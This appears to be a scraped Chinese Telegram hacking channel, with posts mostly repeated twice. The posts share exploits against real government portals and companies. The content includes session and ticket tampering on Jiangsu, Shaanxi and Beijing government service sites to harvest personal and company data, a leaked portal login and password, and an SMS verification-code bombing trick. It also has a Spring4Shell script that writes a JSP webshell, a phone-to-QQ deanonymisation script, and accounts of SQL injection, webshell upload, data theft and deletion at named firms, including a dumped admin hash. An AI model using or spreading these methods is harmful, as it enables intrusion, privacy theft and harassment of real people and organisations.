政务教育部 登录 https://zwfw.moe.gov.cn/
江苏政务 https://www.jszwfw.gov.cn/col/col140123/index.html
法人办事 找特种办事
然后下载软件 https://www.jssjshyzyryfwpt.cn/share/chrome.html
江苏省建设行业职业人员服务平台(安管人员及特种作业人员) . exe
跳转登录
第一步 政务请求地址
https://www.jssjshyzyryfwpt.cn/zwfwauth?ticket=d9edd59a8a590d2a1e8b77635c4cfb80
改成
safetyexplorer://url/https://www.jssjshyzyryfwpt.cn/zwfwauth/login?param=29e46861de1e958532315cdfbdf90a83
跳转打开
打开选择企业信息自助变根
修改法人信息
漏洞存在安全隐患 请江苏官方尽快修复
加密了(但是b64)
具研究
登录员工获取 公司人员 (只能获取江苏的)
优点 江苏的这个可以出公司在职人员以及股东 法人 财务的信息
缺点 你得找个公司企业想办法登录 江苏政
遇到无法自动登录情况抓 登录请求
吧-0改 1
遇到无请求的 清除浏览器记录
ps: 法人料子注册不就行了
江苏政务 https://www.jszwfw.gov.cn/col/col140123/index.html
法人办事 找特种办事
然后下载软件 https://www.jssjshyzyryfwpt.cn/share/chrome.html
江苏省建设行业职业人员服务平台(安管人员及特种作业人员) . exe
跳转登录
第一步 政务请求地址
https://www.jssjshyzyryfwpt.cn/zwfwauth?ticket=d9edd59a8a590d2a1e8b77635c4cfb80
改成
safetyexplorer://url/https://www.jssjshyzyryfwpt.cn/zwfwauth/login?param=29e46861de1e958532315cdfbdf90a83
跳转打开
打开选择企业信息自助变根
修改法人信息
漏洞存在安全隐患 请江苏官方尽快修复
加密了(但是b64)
具研究
登录员工获取 公司人员 (只能获取江苏的)
优点 江苏的这个可以出公司在职人员以及股东 法人 财务的信息
缺点 你得找个公司企业想办法登录 江苏政
遇到无法自动登录情况抓 登录请求
吧-0改 1
遇到无请求的 清除浏览器记录
ps: 法人料子注册不就行了
❤8
QQ隔空发送手机号验证码漏洞
URL: vip.qq.com
随便找一个人 聊天界面发送此链接
点击打开 会员 往下滑 找到会员钻
往最底下翻 找到:豪华绿钻
右上角赠送好友 随便选一个好友
进入界面后 左上角可自定义修改QQ号
自定义数量写120 同意协议并支付 选QQ钱包支付
就弹出一个可以强制发送验证码界面
PS:多个设备多个账号可以一起发,显示频繁之后手机关机重启重复上述步骤即可
URL: vip.qq.com
随便找一个人 聊天界面发送此链接
点击打开 会员 往下滑 找到会员钻
往最底下翻 找到:豪华绿钻
右上角赠送好友 随便选一个好友
进入界面后 左上角可自定义修改QQ号
自定义数量写120 同意协议并支付 选QQ钱包支付
就弹出一个可以强制发送验证码界面
PS:多个设备多个账号可以一起发,显示频繁之后手机关机重启重复上述步骤即可
❤11
和江苏一样的 陕西
浏览器打开:
http://1.85.55.147:8017/sxjyjx/gotologin
账号: 360782001
密码: Xuhao0924@
(怕你们是废物没有账号替换ID)
登录抓ID: sfw12a87f4aw8941fgw8a4ggaw89
然后回到主页 选择注册 单位注册 只输入统一信用社代码 其他的不要输入 输入统一信用社代码以后出单位账号 然后在输入密码 然后重新登录 账号就是信用社代码
登录以后选择
就业见习人员管理 然后选择
就业见习人员申请
然后随便弄一个 好了以后刷新网页
如果刷新没有用 就退出重新登录 继续
然后点 就业见习人员补贴申请 出公司所有
浏览器打开:
http://1.85.55.147:8017/sxjyjx/gotologin
账号: 360782001
密码: Xuhao0924@
(怕你们是废物没有账号替换ID)
登录抓ID: sfw12a87f4aw8941fgw8a4ggaw89
然后回到主页 选择注册 单位注册 只输入统一信用社代码 其他的不要输入 输入统一信用社代码以后出单位账号 然后在输入密码 然后重新登录 账号就是信用社代码
登录以后选择
就业见习人员管理 然后选择
就业见习人员申请
然后随便弄一个 好了以后刷新网页
如果刷新没有用 就退出重新登录 继续
然后点 就业见习人员补贴申请 出公司所有
❤8
北京政务
京通注册 开抓包获取人脸前面的一个包 很容易找到就三个包
前面的包获取 ck
北京政务 登录 替换ck 刷新网页提示图片上面的
(有可能替换不了)
提示:
您将访问的业务需要更多身份信息。请使用“京通”小程序扫描下面的二维码完成更高级别的身份认证。
—————————————————-
https://bdc.ghzrzyw.beijing.gov.cn/eo/wizard/mainMenu.go
打开这个链接 选择用户中心
选择 一证通登录 如果是图片 国家政务这样子就登录成功了 刷新网页就行了 但是局限性很大 查个不动产可以
查:
不动产抵押登记
宅基地使用权及房屋所有权首次登记|
网上办理
京通注册 开抓包获取人脸前面的一个包 很容易找到就三个包
前面的包获取 ck
北京政务 登录 替换ck 刷新网页提示图片上面的
(有可能替换不了)
提示:
您将访问的业务需要更多身份信息。请使用“京通”小程序扫描下面的二维码完成更高级别的身份认证。
—————————————————-
https://bdc.ghzrzyw.beijing.gov.cn/eo/wizard/mainMenu.go
打开这个链接 选择用户中心
选择 一证通登录 如果是图片 国家政务这样子就登录成功了 刷新网页就行了 但是局限性很大 查个不动产可以
查:
不动产抵押登记
宅基地使用权及房屋所有权首次登记|
网上办理
❤6🤔1
漏洞名称:Spring Framework 远程代码执行漏洞(Spring4Shell)
漏洞编号:CVE-2022-22965
危害等级:高危(CVSS 9.8)blog.csdn
漏洞类型:远程代码执行(RCE)
核心原因:在 JDK 9+ 环境下,Spring MVC 的参数绑定机制允许通过 class.module.classLoader 绕过旧补丁(CVE-2010-1622),导致攻击者可修改 Tomcat 的 AccessLogValve 属性,写入恶意 JSP 文件(WebShell)
受影响版本:
组件 受影响版本范围 安全版本
Spring Framework 5.3.0–5.3.17, 5.2.0–5.2.19 ≥5.3.18, ≥5.2.20
Spring Boot 衍生框架(如 2.6.6 以下版本)≥2.6.6
利用条件(需同时满足):
1.JDK 版本 ≥ 9(因 class.module 是 JDK 9+ 引入)juejin
2.使用 Apache Tomcat 作为 Servlet 容器
3.应用以 WAR 包方式部署(非 JAR)nics.nat.gov
4.依赖 spring-webmvc 或 spring-webflux
发送以下请求,若返回 HTTP 400 错误,可能存在漏洞:
原理:Spring 解析 classLoader.URLs[0]=0 时因类型不匹配(URL 数组无法赋值 0)抛出异常
以下代码来自开源项目
功能:自动发送 Payload 并写入 WebShell(路径:/tomcatwar.jsp),密码 pwd=j
访问 WebShell 执行命令:
成功则返回服务器用户信息(如 root)
漏洞编号:CVE-2022-22965
危害等级:高危(CVSS 9.8)blog.csdn
漏洞类型:远程代码执行(RCE)
核心原因:在 JDK 9+ 环境下,Spring MVC 的参数绑定机制允许通过 class.module.classLoader 绕过旧补丁(CVE-2010-1622),导致攻击者可修改 Tomcat 的 AccessLogValve 属性,写入恶意 JSP 文件(WebShell)
受影响版本:
组件 受影响版本范围 安全版本
Spring Framework 5.3.0–5.3.17, 5.2.0–5.2.19 ≥5.3.18, ≥5.2.20
Spring Boot 衍生框架(如 2.6.6 以下版本)≥2.6.6
利用条件(需同时满足):
1.JDK 版本 ≥ 9(因 class.module 是 JDK 9+ 引入)juejin
2.使用 Apache Tomcat 作为 Servlet 容器
3.应用以 WAR 包方式部署(非 JAR)nics.nat.gov
4.依赖 spring-webmvc 或 spring-webflux
发送以下请求,若返回 HTTP 400 错误,可能存在漏洞:
curl -v "http://target:port/path?class.module.classLoader.URLs%5B0%5D=0"
原理:Spring 解析 classLoader.URLs[0]=0 时因类型不匹配(URL 数组无法赋值 0)抛出异常
以下代码来自开源项目
import requests
target_url = "http://target:port/helloworld/greeting"
payload_path = "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
# 发送payload
response = requests.get(target_url + payload_path)
if response.status_code == 200:
print("[+] 漏洞可能存在!访问 WebShell:http://target:port/tomcatwar.jsp?pwd=j&cmd=whoami")
else:
print("[-] 未检测到漏洞")
功能:自动发送 Payload 并写入 WebShell(路径:/tomcatwar.jsp),密码 pwd=j
访问 WebShell 执行命令:
curl "http://your-ip:8080/tomcatwar.jsp?pwd=j&cmd=whoami"
成功则返回服务器用户信息(如 root)
❤14
qf.zip
7.2 KB
概率Q反(需要root)——全自动手机号跑搜索框
烨筱and伤肝肾
(@love_so_yexiao)and(@KHCHADANG)
脚本原理:Tim(轻量版QQ),批量手机号反QQ账号头像URL进行对比,因为是屏幕脚本所以需要root用户使用该脚本。
请使用Termux 安装相关的库 和 tsu,不懂的可以去问群里大牛
测试效果↓
注:里面的对比脚本要用电脑安装opencv,arm安卓不支持opencv
termux运行主程序
mt管理器root运行配套sh
使用tim的搜索框部分实现
如果用不了就去自己抓xy坐标自己填到脚本里面
开发者模式开触摸坐标显示,长按查看上面显示的xy
脚本里面第一个坐标是搜索框的最右侧(不是清除,一定要靠右),第二个坐标是手机输入法的回车键
运行主程序py之前一定要给tim打开,自己随便搜一个手机号之后再点击一遍那个输入框
烨筱and伤肝肾
(@love_so_yexiao)and(@KHCHADANG)
解压密码 https://t.me/yexiao_love_you
脚本原理:Tim(轻量版QQ),批量手机号反QQ账号头像URL进行对比,因为是屏幕脚本所以需要root用户使用该脚本。
请使用Termux 安装相关的库 和 tsu,不懂的可以去问群里大牛
测试效果↓
17324958813 - http://thirdqq.qlogo.cn/g?b=oidb&k=4H0jEFqX9hJrD1FxvxVXQA&kti=aQm0VQwB4hA&s=40
15322509015 - http://thirdqq.qlogo.cn/g?b=oidb&k=o11FCyCnLqOEd1IDygg2AQ&kti=aQm03wwB4hA&s=40
15090536410 - http://thirdqq.qlogo.cn/g?b=oidb&k=5dJzT4bhyqNIPBibZHJqJUA&kti=aQm06AwB4hI&s=40
注:里面的对比脚本要用电脑安装opencv,arm安卓不支持opencv
termux运行主程序
mt管理器root运行配套sh
使用tim的搜索框部分实现
如果用不了就去自己抓xy坐标自己填到脚本里面
开发者模式开触摸坐标显示,长按查看上面显示的xy
脚本里面第一个坐标是搜索框的最右侧(不是清除,一定要靠右),第二个坐标是手机输入法的回车键
运行主程序py之前一定要给tim打开,自己随便搜一个手机号之后再点击一遍那个输入框
唯一留言:叮当猫管理员是我的吹牛资本,诈骗和装逼也是我的最强手段,我的所有能力来源别人的想象力,我的人脉全来自我的吹牛逼技术,得到很多人的好感度,我的一句话就能让我的人脉害死你全家,我的一句话就能让别人给我全国头接口玩,我喜欢拿着别人的全国头泛滥,然后栽赃陷害给别人,说是别人想要泛滥自己才泛滥,我喜欢装大佬,跟别人说Q反的方向是我给的,我脑电波意淫出来的邮箱Q反就是我的压箱底接口,这辈子不会泛滥,你以为我是接口神?错了,我接口都是巴结别人的!你以为我是逆向解密大牛?错了,我是巴结别人给我解密的!我的组织连几个卖号的都能进去,这就是我组织的魅力,没有指名道姓说谁,不要在评论区破防对号入座,希望改正好自己虚伪的性格,并不是对某组织所有人存在恶意,大部分人存在一定的实力,只是对某人的人品做单方面评价
没有指名道姓说谁哦~ 急=输
请不要指点江山 虽然这个Q反含金量再怎么低 我们也承认只是个概率Q反 但请不要因此说垃圾或没用 经典之:拿破仑发现新大陆回来之后名声大噪,但是很多人都在偷偷议论说只要有人一直开船向那个方向开,谁都可以发现新大陆。有一次拿破仑知道他们议论的事之后,跟周围的人说:“你们谁能将一个鸡蛋立在桌子上面而不动?”周围的人都没有动,静静看着拿破仑表演。拿破仑拿起鸡蛋砸的凹进去了一点,鸡蛋果然立在桌子上不动了。众人嘲笑道:“这有什么好炫耀的,人人都知道的道理罢了。”拿破仑说:“本身就没什么好炫耀的,可是先生们,女士们,你们怎么没想过用到这个方法呢?难道真的是因为你们想到了只是懒得动吗?”
❤5
今日分享:黑龙江省公安厅
等级:高危
这里我们选择个人登录,只有登陆后才能更好的去测试
进入后发现系统维护中,这里我们使用 F12,查看源码,把系统维护中的遮罩删除
删除后我们发现可以正常使用了,这里我们选择进入进度查询 (一般来说我们挖掘后台洞都会选择 查询 预约 申报 个人信息这些功能点)
这里我们查看Js源码 发现存在一个/api/hljga-serv/projectApplyDelivery
这里我们抓包进行访问
成功拿到获取敏感数据上千条
@Yuhui_ddos
等级:高危
这里我们选择个人登录,只有登陆后才能更好的去测试
进入后发现系统维护中,这里我们使用 F12,查看源码,把系统维护中的遮罩删除
删除后我们发现可以正常使用了,这里我们选择进入进度查询 (一般来说我们挖掘后台洞都会选择 查询 预约 申报 个人信息这些功能点)
这里我们查看Js源码 发现存在一个/api/hljga-serv/projectApplyDelivery
这里我们抓包进行访问
成功拿到获取敏感数据上千条
@Yuhui_ddos
❤14😍1
BYSGS会所---网站漏洞公布
qf.zip
留言内涵的不是蛤蟆,而是其他人😪 ,不要乱套
Please open Telegram to view this post
VIEW IN TELEGRAM
今日分享:森玛克精工科技(江苏)有限公司
链接: http://www.semirke.com/about.php?id=1
等级:SQL注入 -> Getshell
首先在对目标进行信息收集时,发现其官网一处
深入数据库后发现,其中存放着公司最核心的业务数据。这里共计拿到该公司的一些技术数据,包括各类减速机、电机的核心设计图纸、技术参数、物料清单(BOM表)。此外,还获取了国内客户的详细联系方式、历年销售合同及定价策略,以及国内供应商名单。
接着,为进一步窃取服务器上的文件资料,我们利用SQL注入的
这里成功进入内网了,后续在进行内部资料寻找,把中心放在研发和财务部门的文件服务器中,不过都是支出流水和一些工作报告,没什么用
目前把sql数据库的东西全删了,网站还能访问,欢迎各位大牛访问。😄
ps:图片默认保存的路径找不到了,只能纯文本了QAQ
@Yuhui_ddos thank you~
链接: http://www.semirke.com/about.php?id=1
等级:SQL注入 -> Getshell
首先在对目标进行信息收集时,发现其官网一处
about.php 参数存在sql注入漏洞。通过sqlmap进行探测,确认了时间盲注和联合查询注入的存在,并成功获取数据库 adm82571079_db 的权限。深入数据库后发现,其中存放着公司最核心的业务数据。这里共计拿到该公司的一些技术数据,包括各类减速机、电机的核心设计图纸、技术参数、物料清单(BOM表)。此外,还获取了国内客户的详细联系方式、历年销售合同及定价策略,以及国内供应商名单。
接着,为进一步窃取服务器上的文件资料,我们利用SQL注入的
INTO OUTFILE 功能,在读取网站配置文件获取到物理路径后,成功写入webshell,控制了服务器这里成功进入内网了,后续在进行内部资料寻找,把中心放在研发和财务部门的文件服务器中,不过都是支出流水和一些工作报告,没什么用
目前把sql数据库的东西全删了,网站还能访问,欢迎各位大牛访问。😄
ps:图片默认保存的路径找不到了,只能纯文本了QAQ
@Yuhui_ddos thank you~
Semirke
森玛克精工科技(江苏)有限公司
森玛克精工科技(江苏)有限公司于2015年07月30日成立,公司位于苏州太仓市城厢镇顾港路28号,主要生产经营意大利刹车电机、意大利减速机、NMRV蜗轮蜗杆减速机、R,F,K,S硬齿面减速机、UD变速机、电磁离合刹车器、三相异步电机、VF系列蜗轮蜗杆减速机、双曲面齿轮减速机、行星减速机、意大利SITI西帝减速机、刹车电机等产品,公司多年致力于产业,切实推进与各大企业、厂家的合资、合作,用产业化发展的思路服务于社会和广大用户。
❤4
今日渗透分享:北京京瀚禹电子工程技术有限公司SQL注入
目标:北京京瀚禹电子工程技术有限公司 ( jhyjczx.com )
技术栈:PHP 5.2.17, Apache, MySQL 5.0.12
在对目标进行信息收集中,发现
直接上sqlmap,扫描结果非常给力:
一个时间盲注、一个布尔盲注、一个联合注入,UNION查询的存在,基本可以判断无WAF,直接开始脱库。
数据获取:
成功获取数据库
Database: bdm10851955_db
Table: admin
[1 entry]
+--------------+----------------------------------+
| aname | apass |
+--------------+----------------------------------+
| jhywzhht2511 | 122c79b410c885197c565617a1066142 |
+--------------+----------------------------------+
密码是MD5加密,没去暴力破解,感兴趣的可以自己试试
总结:
一个严重的SQL注入,直接导致后台失守。本来后面还有一个竞争条件可以拿shell,但懒得搞了,我要去玩明日方舟终末地!!!
作者: @Yuhui_ddos
来源: @Yuhui_net
目标:北京京瀚禹电子工程技术有限公司 ( jhyjczx.com )
技术栈:PHP 5.2.17, Apache, MySQL 5.0.12
在对目标进行信息收集中,发现
about.php?cid=1&id=2 这个URL存在注入风险。直接上sqlmap,扫描结果非常给力:
一个时间盲注、一个布尔盲注、一个联合注入,UNION查询的存在,基本可以判断无WAF,直接开始脱库。
数据获取:
成功获取数据库
bdm10851955_db,其中 admin 表引起了我们的注意:Database: bdm10851955_db
Table: admin
[1 entry]
+--------------+----------------------------------+
| aname | apass |
+--------------+----------------------------------+
| jhywzhht2511 | 122c79b410c885197c565617a1066142 |
+--------------+----------------------------------+
密码是MD5加密,没去暴力破解,感兴趣的可以自己试试
总结:
一个严重的SQL注入,直接导致后台失守。本来后面还有一个竞争条件可以拿shell,但懒得搞了,我要去玩明日方舟终末地!!!
作者: @Yuhui_ddos
来源: @Yuhui_net
❤4